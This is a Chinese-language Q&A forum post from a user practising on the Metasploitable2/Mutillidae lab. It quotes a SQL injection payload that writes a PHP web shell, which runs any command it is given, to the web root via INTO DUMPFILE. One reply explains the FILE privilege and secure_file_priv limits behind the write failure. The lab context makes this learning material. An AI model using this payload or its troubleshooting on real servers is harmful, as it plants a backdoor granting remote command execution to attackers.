我目前正在使用 php 后门程序在我的本地服务器(metasploitable2 mutillidate)上种植 php 文件。我找出了它有多少列并制作了一个简单的代码。' UNION SELECT null, null, null, null, '<?php if(isset($_REQUEST["cmd"])){ echo "<pre>"; $cmd = ($_REQUEST["cmd"]); system($cmd); echo "</pre>"; die; }?>' INTO DUMPFILE '/var/www/mutillidae/backdoor.php' -- 我将此代码编码为 url 表单并提交,但我失败了。它给了我与到目前为止不同的错误,但仍然不起作用。错误说:'执行查询时出错:无法创建/写入文件'/var/www/mutillidae/backdoor.php'我想这与特权有关,但我不确定
1 回答
MYYA
TA贡献1868条经验 获得超4个赞
执行查询的 MySQL 用户必须具有FILE权限才能使用SELECT ... INTO OUTFILE或SELECT ... INTO DUMPFILE。此外,如果secure_file_priv系统变量设置为目录的路径名,则您只能写入该目录中的文件。
- 1 回答
- 0 关注
- 122 浏览
添加回答
举报
0/150
提交
取消